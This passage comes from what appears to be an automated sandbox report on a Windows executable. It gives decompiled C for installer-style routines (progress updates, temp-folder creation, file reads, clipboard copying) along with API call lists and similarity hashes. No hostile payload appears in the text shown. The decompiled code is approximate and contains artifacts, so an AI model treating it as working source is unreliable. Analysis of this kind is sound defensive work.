	void* _t28; // never assigned anywhere in this listing (decompiler artifact)

	_t27 = _a4;
	while(_t27 >= 0) {
		// 0x1c-byte record at index _t27 in the table pointed to by *0x7a2fb0
		_t8 = _t27 * 0x1c +  *0x7a2fb0;
		__eflags =  *_t8 - 1;
		if( *_t8 == 1) {
			break; // a record whose first field is 1 ends the loop
		}
		_push(_t8); // executed
		_t10 = E00401439(); // executed
		__eflags = _t10 - 0x7fffffff;
		if(_t10 == 0x7fffffff) {
			return 0x7fffffff; // error value is propagated to the caller
		}
		__eflags = _t10;
		if(__eflags < 0) {
			// negative return value is translated through E00405936 before use
			_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
			__eflags = _t10;
		}
		if(__eflags != 0) {
			// non-zero: continue at record _t10 - 1; _t13 is the distance moved
			_t12 = _t10 - 1;
			_t21 = _t27;
			_t27 = _t12;
			_t13 = _t12 - _t21;
			__eflags = _t13;
		} else {
			// zero: advance to the next record
			_t13 = 1;
			_t27 = _t27 + 1;
		}
		__eflags =  *(_t28 + 0xc);
		if( *(_t28 + 0xc) != 0) {
			// add the distance moved to the counter at *0x7a276c and report it to the
			// window at *(_t28 + 0x18): 0x402 is WM_USER + 2 (PBM_SETPOS for a progress
			// bar); MulDiv scales the counter into 0..30000 (0x7530), dividing by the
			// total at *0x7a2754, or by 1 when that total is zero
			 *0x7a276c =  *0x7a276c + _t13;
			_t14 =  *0x7a2754;
			__eflags = _t14;
			_t24 = (0 | _t14 == 0x00000000) + _t14;
			__eflags = _t24;
			SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
		}
	}
	return 0;
}

APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
• SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
Memory Dump Source
• Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend
• String ID: 4@
• API String ID: 3850602802-2385517874
• Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
• Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
• Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
• Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
E00403116(void* __eflags) {
	void* _t2;
	void* _t5;
	CHAR* _t6;

	_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
	E00405BFB(_t6);
	_t2 = E00405538(_t6);
	if(_t2 != 0) {
		E004054CC(_t6);
		CreateDirectoryA(_t6, 0); // executed; makes sure the temp directory exists
		// the first argument is the quoted path of the sample itself followed by a space
		_t5 = E004056BF("\"C:\\Users\\hardz\\Desktop\\TazxfJHRhq.exe\" ", _t6); // executed
		return _t5;
	} else {
		return _t2;
	}
}

APIs
  • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
  • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
  • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
  • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
• CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
Memory Dump Source
• Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID: "C:\Users\user\Desktop\TazxfJHRhq.exe" $C:\Users\user\AppData\Local\Temp\
• API String ID: 4115351271-1637379658
• Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
• Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
• Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
• Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
E00405690(CHAR* _a4, long _a8, long _a12) {
	signed int _t5;
	void* _t6;

	_t5 = GetFileAttributesA(_a4); // executed
	asm("sbb ecx, ecx");
	// dwFlagsAndAttributes is built with the sbb trick: the existing file's attributes,
	// or 0 when GetFileAttributesA returned INVALID_FILE_ATTRIBUTES (-1); the decompiler's
	// rendering of that expression is approximate. Share mode 1 = FILE_SHARE_READ.
	_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
	return _t6;
}

APIs
• GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
• CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
Memory Dump Source
• Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
• Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
• Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
• Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004030CD(void* _a4, long _a8) {
	int _t6;
	long _t10;

	_t10 = _a8;
	// read _a8 bytes from the global file handle at *0x409020 into _a4;
	// the number of bytes actually read is written back over _a8
	_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
	if(_t6 == 0 || _a8 != _t10) {
		return 0; // failure or short read
	} else {
		return 1; // exactly the requested number of bytes was read
	}
}

APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
Memory Dump Source
• Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
• Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
• Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
• Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004030FF(long _a4) {
	long _t2;

	// seek the global file handle at *0x409020 to absolute offset _a4 (dwMoveMethod 0 = FILE_BEGIN)
	_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
	return _t2;
}

APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
Memory Dump Source
• Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
• Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
• Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
• Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
Uniqueness

Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          C-Code - Quality: 89%
                                                                          			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
                                                                          				struct HWND__* _v8;
                                                                          				struct tagRECT _v24;
                                                                          				void* _v32;
                                                                          				signed int _v36;
                                                                          				int _v40;
                                                                          				CHAR* _v44;
                                                                          				signed int _v48;
                                                                          				int _v52;
                                                                          				void* _v56;
                                                                          				void* _v64;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				long _t86;
                                                                          				struct HMENU__* _t88;
                                                                          				unsigned int _t91;
                                                                          				int _t93;
                                                                          				int _t94;
                                                                          				void* _t100;
                                                                          				intOrPtr _t123;
                                                                          				struct HWND__* _t127;
                                                                          				int _t148;
                                                                          				int _t149;
                                                                          				struct HWND__* _t153;
                                                                          				struct HWND__* _t157;
                                                                          				struct HMENU__* _t159;
                                                                          				long _t161;
                                                                          				CHAR* _t162;
                                                                          				CHAR* _t163;
                                                                          
                                                                          				_t153 =  *0x7a2764;
                                                                          				_t148 = 0;
                                                                          				_v8 = _t153;
                                                                          				if(_a8 != 0x110) {
                                                                          					if(_a8 == 0x405) {
                                                                          						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
                                                                          					}
                                                                          					if(_a8 != 0x111) {
                                                                          						L16:
                                                                          						if(_a8 != 0x404) {
                                                                          							L24:
                                                                          							if(_a8 != 0x7b || _a12 != _t153) {
                                                                          								goto L19;
                                                                          							} else {
                                                                          								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
                                                                          								_a8 = _t86;
                                                                          								if(_t86 <= _t148) {
                                                                          									L36:
                                                                          									return 0;
                                                                          								}
                                                                          								_t88 = CreatePopupMenu();
                                                                          								_push(0xffffffe1);
                                                                          								_push(_t148);
                                                                          								_t159 = _t88;
                                                                          								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
                                                                          								_t91 = _a16;
                                                                          								if(_t91 != 0xffffffff) {
                                                                          									_t149 = _t91;
                                                                          									_t93 = _t91 >> 0x10;
                                                                          								} else {
                                                                          									GetWindowRect(_t153,  &_v24);
                                                                          									_t149 = _v24.left;
                                                                          									_t93 = _v24.top;
                                                                          								}
                                                                          								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
                                                                          								_t161 = 1;
                                                                          								if(_t94 == 1) {
                                                                          									_v56 = _t148;
                                                                          									_v44 = 0x79f580;
                                                                          									_v40 = 0xfff;
                                                                          									_a4 = _a8;
                                                                          									do {
                                                                          										_a4 = _a4 - 1;
                                                                          										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
                                                                          									} while (_a4 != _t148);
                                                                          									OpenClipboard(_t148);
                                                                          									EmptyClipboard();
                                                                          									_t100 = GlobalAlloc(0x42, _t161);
                                                                          									_a4 = _t100;
                                                                          									_t162 = GlobalLock(_t100);
                                                                          									do {
                                                                          										_v44 = _t162;
                                                                          										SendMessageA(_v8, 0x102d, _t148,  &_v64);
                                                                          										_t163 =  &(_t162[lstrlenA(_t162)]);
                                                                          										 *_t163 = 0xa0d;
                                                                          										_t162 =  &(_t163[2]);
                                                                          										_t148 = _t148 + 1;
                                                                          									} while (_t148 < _a8);
                                                                          									GlobalUnlock(_a4);
                                                                          									SetClipboardData(1, _a4);
                                                                          									CloseClipboard();
                                                                          								}
                                                                          								goto L36;
                                                                          							}
                                                                          						}
                                                                          						if( *0x7a274c == _t148) {
                                                                          							ShowWindow( *0x7a2f84, 8);
                                                                          							if( *0x7a300c == _t148) {
                                                                          								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
                                                                          							}
                                                                          							E00403D80(1);
                                                                          							goto L24;
                                                                          						}
                                                                          						 *0x79e950 = 2;
                                                                          						E00403D80(0x78);
                                                                          						goto L19;
                                                                          					} else {
                                                                          						if(_a12 != 0x403) {
                                                                          							L19:
                                                                          							return E00403E0E(_a8, _a12, _a16);
                                                                          						}
                                                                          						ShowWindow( *0x7a2750, _t148);
                                                                          						ShowWindow(_t153, 8);
                                                                          						E0040417A();
                                                                          						goto L16;
                                                                          					}
                                                                          				}
                                                                          				_v48 = _v48 | 0xffffffff;
                                                                          				_v36 = _v36 | 0xffffffff;
                                                                          				_v56 = 2;
                                                                          				_v52 = 0;
                                                                          				_v44 = 0;
                                                                          				_v40 = 0;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t123 =  *0x7a2f88;
                                                                          				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                                          				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                                          				 *0x7a2750 = GetDlgItem(_a4, 0x403);
                                                                          				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
                                                                          				_t127 = GetDlgItem(_a4, 0x3f8);
                                                                          				 *0x7a2764 = _t127;
                                                                          				_v8 = _t127;
                                                                          				E00403DDC( *0x7a2750);
                                                                          				 *0x7a2754 = E004045FA(4);
                                                                          				 *0x7a276c = 0;
                                                                          				GetClientRect(_v8,  &_v24);
                                                                          				_v48 = _v24.right - GetSystemMetrics(0x15);
                                                                          				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                                          				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                          				if(_a8 >= 0) {
                                                                          					SendMessageA(_v8, 0x1001, 0, _a8);
                                                                          					SendMessageA(_v8, 0x1026, 0, _a8);
                                                                          				}
                                                                          				if(_a12 >= _t148) {
                                                                          					SendMessageA(_v8, 0x1024, _t148, _a12);
                                                                          				}
                                                                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                          				_push(0x1b);
                                                                          				E00403DA7(_a4);
                                                                          				if(( *0x7a2f90 & 0x00000003) != 0) {
                                                                          					ShowWindow( *0x7a2750, _t148);
                                                                          					if(( *0x7a2f90 & 0x00000002) != 0) {
                                                                          						 *0x7a2750 = _t148;
                                                                          					} else {
                                                                          						ShowWindow(_v8, 8);
                                                                          					}
                                                                          				}
                                                                          				_t157 = GetDlgItem(_a4, 0x3ec);
                                                                          				SendMessageA(_t157, 0x401, _t148, 0x75300000);
                                                                          				if(( *0x7a2f90 & 0x00000004) != 0) {
                                                                          					SendMessageA(_t157, 0x409, _t148, _a12);
                                                                          					SendMessageA(_t157, 0x2001, _t148, _a8);
                                                                          				}
                                                                          				goto L36;
                                                                          			}

                                                                          APIs
                                                                          • GetDlgItem.USER32 ref: 00404EFF
                                                                          • GetDlgItem.USER32 ref: 00404F0E
                                                                          • GetDlgItem.USER32 ref: 00404F1D
                                                                            • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
                                                                          • GetClientRect.USER32 ref: 00404F4B
                                                                          • GetSystemMetrics.USER32 ref: 00404F53
                                                                          • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
                                                                          • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
                                                                          • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
                                                                          • ShowWindow.USER32(?,00000008), ref: 00404FEF
                                                                          • GetDlgItem.USER32 ref: 00405005
                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
                                                                          • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
                                                                          • GetDlgItem.USER32 ref: 00405057
                                                                          • CreateThread.KERNEL32 ref: 00405065
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040506C
                                                                          • ShowWindow.USER32(00000000), ref: 00405090
                                                                          • ShowWindow.USER32(?,00000008), ref: 00405095
                                                                          • ShowWindow.USER32(00000008), ref: 004050DB
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
                                                                          • CreatePopupMenu.USER32 ref: 0040511E
                                                                          • AppendMenuA.USER32 ref: 00405133
                                                                          • GetWindowRect.USER32 ref: 00405146
                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
                                                                          • OpenClipboard.USER32(00000000), ref: 004051B3
                                                                          • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
                                                                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
                                                                          • GlobalLock.KERNEL32 ref: 004051CC
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
                                                                          • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
                                                                          • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
                                                                          • SetClipboardData.USER32 ref: 00405209
                                                                          • CloseClipboard.USER32 ref: 0040520F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
                                                                          • String ID: {
                                                                          • API String ID: 1050754034-366298937
                                                                          • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                          • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
                                                                          • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                          • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 93%
                                                                          			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                          				struct HWND__* _v8;
                                                                          				struct HWND__* _v12;
                                                                          				signed int _v16;
                                                                          				intOrPtr _v20;
                                                                          				struct HBITMAP__* _v24;
                                                                          				long _v28;
                                                                          				int _v32;
                                                                          				signed int _v40;
                                                                          				int _v44;
                                                                          				signed int* _v56;
                                                                          				intOrPtr _v60;
                                                                          				signed int _v64;
                                                                          				long _v68;
                                                                          				void* _v72;
                                                                          				intOrPtr _v76;
                                                                          				intOrPtr _v80;
                                                                          				void* _v84;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				struct HWND__* _t182;
                                                                          				int _t196;
                                                                          				long _t202;
                                                                          				signed int _t206;
                                                                          				signed int _t217;
                                                                          				void* _t220;
                                                                          				void* _t221;
                                                                          				int _t227;
                                                                          				signed int _t232;
                                                                          				signed int _t233;
                                                                          				signed int _t240;
                                                                          				void* _t252;
                                                                          				intOrPtr _t258;
                                                                          				char* _t268;
                                                                          				signed char _t269;
                                                                          				long _t274;
                                                                          				int _t280;
                                                                          				signed int* _t281;
                                                                          				int _t282;
                                                                          				long _t283;
                                                                          				int _t285;
                                                                          				long _t286;
                                                                          				signed int _t287;
                                                                          				long _t288;
                                                                          				signed int _t291;
                                                                          				signed int _t298;
                                                                          				signed int _t300;
                                                                          				signed int _t302;
                                                                          				int* _t310;
                                                                          				void* _t311;
                                                                          				int _t315;
                                                                          				int _t316;
                                                                          				int _t317;
                                                                          				signed int _t318;
                                                                          				void* _t320;
                                                                          
                                                                          				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                          				_t182 = GetDlgItem(_a4, 0x408);
                                                                          				_t280 =  *0x7a2fa8;
                                                                          				_t320 = SendMessageA;
                                                                          				_v8 = _t182;
                                                                          				_t315 = 0;
                                                                          				_v32 = _t280;
                                                                          				_v20 =  *0x7a2f88 + 0x94;
                                                                          				if(_a8 != 0x110) {
                                                                          					L23:
                                                                          					if(_a8 != 0x405) {
                                                                          						_t289 = _a16;
                                                                          					} else {
                                                                          						_a12 = _t315;
                                                                          						_t289 = 1;
                                                                          						_a8 = 0x40f;
                                                                          						_a16 = 1;
                                                                          					}
                                                                          					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                          						_v16 = _t289;
                                                                          						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                                          							if(( *0x7a2f91 & 0x00000002) != 0) {
                                                                          								L41:
                                                                          								if(_v16 != _t315) {
                                                                          									_t232 = _v16;
                                                                          									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                          										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                          									}
                                                                          									_t233 = _v16;
                                                                          									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                          										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                          											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                                          										} else {
                                                                          											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          								goto L48;
                                                                          							}
                                                                          							if(_a8 == 0x413) {
                                                                          								L33:
                                                                          								_t289 = 0 | _a8 != 0x00000413;
                                                                          								_t240 = E00404627(_v8, _a8 != 0x413);
                                                                          								if(_t240 >= _t315) {
                                                                          									_t93 = _t280 + 8; // 0x8
                                                                          									_t310 = _t240 * 0x418 + _t93;
                                                                          									_t289 =  *_t310;
                                                                          									if((_t289 & 0x00000010) == 0) {
                                                                          										if((_t289 & 0x00000040) == 0) {
                                                                          											_t298 = _t289 ^ 0x00000001;
                                                                          										} else {
                                                                          											_t300 = _t289 ^ 0x00000080;
                                                                          											if(_t300 >= 0) {
                                                                          												_t298 = _t300 & 0xfffffffe;
                                                                          											} else {
                                                                          												_t298 = _t300 | 0x00000001;
                                                                          											}
                                                                          										}
                                                                          										 *_t310 = _t298;
                                                                          										E0040117D(_t240);
                                                                          										_t289 = 1;
                                                                          										_a8 = 0x40f;
                                                                          										_a12 = 1;
                                                                          										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
                                                                          									}
                                                                          								}
                                                                          								goto L41;
                                                                          							}
                                                                          							_t289 = _a16;
                                                                          							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                          								goto L41;
                                                                          							}
                                                                          							goto L33;
                                                                          						} else {
                                                                          							goto L48;
                                                                          						}
                                                                          					} else {
                                                                          						L48:
                                                                          						if(_a8 != 0x111) {
                                                                          							L56:
                                                                          							if(_a8 == 0x200) {
                                                                          								SendMessageA(_v8, 0x200, _t315, _t315);
                                                                          							}
                                                                          							if(_a8 == 0x40b) {
                                                                          								_t220 =  *0x79f564;
                                                                          								if(_t220 != _t315) {
                                                                          									ImageList_Destroy(_t220);
                                                                          								}
                                                                          								_t221 =  *0x79f578;
                                                                          								if(_t221 != _t315) {
                                                                          									GlobalFree(_t221);
                                                                          								}
                                                                          								 *0x79f564 = _t315;
                                                                          								 *0x79f578 = _t315;
                                                                          								 *0x7a2fe0 = _t315;
                                                                          							}
                                                                          							if(_a8 != 0x40f) {
                                                                          								L86:
                                                                          								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
                                                                          									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                                          									ShowWindow(_v8, _t316);
                                                                          									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                          								}
                                                                          								goto L89;
                                                                          							} else {
                                                                          								E004011EF(_t289, _t315, _t315);
                                                                          								if(_a12 != _t315) {
                                                                          									E00401410(8);
                                                                          								}
                                                                          								if(_a16 == _t315) {
                                                                          									L73:
                                                                          									E004011EF(_t289, _t315, _t315);
                                                                          									_v32 =  *0x79f578;
                                                                          									_t196 =  *0x7a2fa8;
                                                                          									_v60 = 0xf030;
                                                                          									_v16 = _t315;
                                                                          									if( *0x7a2fac <= _t315) {
                                                                          										L84:
                                                                          										InvalidateRect(_v8, _t315, 1);
                                                                          										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
                                                                          											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
                                                                          										}
                                                                          										goto L86;
                                                                          									}
                                                                          									_t281 = _t196 + 8;
                                                                          									do {
                                                                          										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                          										if(_t202 != _t315) {
                                                                          											_t291 =  *_t281;
                                                                          											_v68 = _t202;
                                                                          											_v72 = 8;
                                                                          											if((_t291 & 0x00000001) != 0) {
                                                                          												_v72 = 9;
                                                                          												_v56 =  &(_t281[4]);
                                                                          												_t281[0] = _t281[0] & 0x000000fe;
                                                                          											}
                                                                          											if((_t291 & 0x00000040) == 0) {
                                                                          												_t206 = (_t291 & 0x00000001) + 1;
                                                                          												if((_t291 & 0x00000010) != 0) {
                                                                          													_t206 = _t206 + 3;
                                                                          												}
                                                                          											} else {
                                                                          												_t206 = 3;
                                                                          											}
                                                                          											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                          											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                          											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                          										}
                                                                          										_v16 = _v16 + 1;
                                                                          										_t281 =  &(_t281[0x106]);
                                                                          									} while (_v16 <  *0x7a2fac);
                                                                          									goto L84;
                                                                          								} else {
                                                                          									_t282 = E004012E2( *0x79f578);
                                                                          									E00401299(_t282);
                                                                          									_t217 = 0;
                                                                          									_t289 = 0;
                                                                          									if(_t282 <= _t315) {
                                                                          										L72:
                                                                          										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                          										_a16 = _t282;
                                                                          										_a8 = 0x420;
                                                                          										goto L73;
                                                                          									} else {
                                                                          										goto L69;
                                                                          									}
                                                                          									do {
                                                                          										L69:
                                                                          										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                                          											_t289 = _t289 + 1;
                                                                          										}
                                                                          										_t217 = _t217 + 1;
                                                                          									} while (_t217 < _t282);
                                                                          									goto L72;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                          							goto L89;
                                                                          						} else {
                                                                          							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                          							if(_t227 == 0xffffffff) {
                                                                          								goto L89;
                                                                          							}
                                                                          							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
